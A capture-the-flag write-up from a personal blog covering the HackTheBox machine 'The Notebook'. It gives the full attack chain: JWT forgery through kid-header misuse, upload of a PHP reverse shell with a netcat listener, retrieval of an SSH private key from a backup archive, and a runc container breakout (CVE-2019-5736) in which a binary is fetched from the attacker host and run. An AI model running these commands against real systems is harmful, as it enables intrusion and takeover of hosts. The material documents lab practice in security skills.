NepCodeX

Byte Musings: Where Tech Meets Curiosity


The Notebook Walkthrough – Hackthebox – Writeup

the notebook walkthrough writeup hackthebox

At the time of writing this post, the machine was in active list. So, only proceed if you have tried on your own. Welcome to “The Notebook Walkthrough – Hackthebox – Writeup”.

Note: To write public writeups for active machines is against the rules of HTB. Otherwise, I could protect this blog post using the root flag. Also, I couldn’t find a good content locker that allows custom message for WordPress. So, I couldn’t password protect this blog post using other methods like root hash, root-only readable file contents, etc.

Tech Support Walkthrough – Vulnhub – Writeup

Scan open ports

As usual, I started the exploit by enumerating the open ports.

nmap -T4 -sC -sV -p- --min-rate=1000 -oN nmap.log 10.10.10.230
image 543

From the screenshot above, I knew I had to rely on the web server for further enumeration.

Enumerate the webserver

Next, I opened the IP address on my firefox.

image 544

I also tried to discover additional file paths, however, I couldn’t find anything. Hence, I decided to fire up the burp suite and register for an account. As soon as I register, I got a JWT token in the response.

image 545

Next, I copied the token and pasted it on the jwt.io website to decode it.

image 546

Reference: https://blog.pentesteracademy.com/hacking-jwt-tokens-kid-claim-misuse-key-leak-e7fce9a10a9c

It uses a key identifier header that we can misuse to gain access to the system. Likewise, you can see that it might be using a private key to secure the header. So, I am going to host my private key on my network and create a token based on that.

openssl genrsa -out privKey.key 2048
python3 -m http.server 7070
image 547

Then, I copied the encoded JWT and set it in the cookies using the firefox developer’s tool.

image 548

You can see that, I can see notes and upload files using admin panel. So, I looked at some notes.

image 549
image 550

From the screenshots above, we see that we can somehow execute php files that could give us a reverse shell. Next, there are regular backups. This means that there might be some cron jobs that we can exploit to escalate further privileges.

So, I copied the shell file and changed the IP and port of my machine.

cp /usr/share/webshells/php/php-reverse-shell.php shell.php
vi shell.php # change ip and port
nc -nlvp 4444 # the port that I am listening on

Next, I uploaded it.

image 551

I clicked the “View” button to get the reverse shell.

image 553

Finally, I got the access to the machine.

Getting a user’s shell

Now that I have got access to the reverse shell, I improved the dumb shell.

image 554
image 555

Then, I listed down the users of the machine.

cat /etc/passwd | grep bash
image 556

We have a user noah on the target. Now, to get an access to the machine, I already had a hint from one of the notes in the web app. It said that regular backups are being performed. So, I looked at the backups directory.

cd /var/backups
ls -al
image 557

On the directory, I found a home backup file. So, I downloaded the file to my local machine.

which python3
python3 -m http.server

On the local machine.

wget http://10.10.10.230:8000/home.tar.gz
tar -xzvf home.tar.gz
cd home/noah
ls -al
cd .ssh
ls -al
image 558

Here, we have the private key that could allow us to login as noah.

ssh [email protected] -i id_rsa
image 559

Finally, I got the flag.

ls -al
cat user.txt
image 560

Root privilege escalation

Finally, I have to escalate the privileges to root. So, I checked for the sudo permissions.

sudo -l
image 561

The user could execute some commands on the docker container without requiring a password.

docker --version
image 562

Also, the version of docker is 18.06.0-ce and the versions below 18.09.2 suffer from docker container breakout exploits. So, I first run the command.

sudo docker exec -it webapp-dev01 bash
image 563

Now, I have to get the root of the host machine.

https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout#runc-exploit-cve-2019-5736

https://github.com/Frichetten/CVE-2019-5736-PoC/blob/master/main.go

I read the information about the exploits and downloaded the exploit to my local machine. Then, I changed the payload according to my requirement.

wget https://raw.githubusercontent.com/Frichetten/CVE-2019-5736-PoC/master/main.go
vi main.go
go build main.go
python3 -m http.server
image 567

I added the code to spawn a reverse shell on port 9999.

On the container of the target machine.

wget http://10.10.14.39:8000/main && chmod +x main && ./main
image 565

Then, without hurry, while the message “Overwritten /bin/sh successfully” is only present, I executed the following command on another SSH instance.

sudo docker exec -it webapp-dev01 /bin/sh
image 568
image 569

It gave me the root shell of the target machine.

image 570

Update

For those, who are stuck at the privilege escalation step, I have created a demo in gif. Please, check the following dropbox link and make sure you drop a comment if this worked.

https://www.dropbox.com/s/z24z4e2wbwbt7n0/the%20notebook.gif?dl=0



0 0 votes
Article Rating
Subscribe
Notify of
guest
15 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments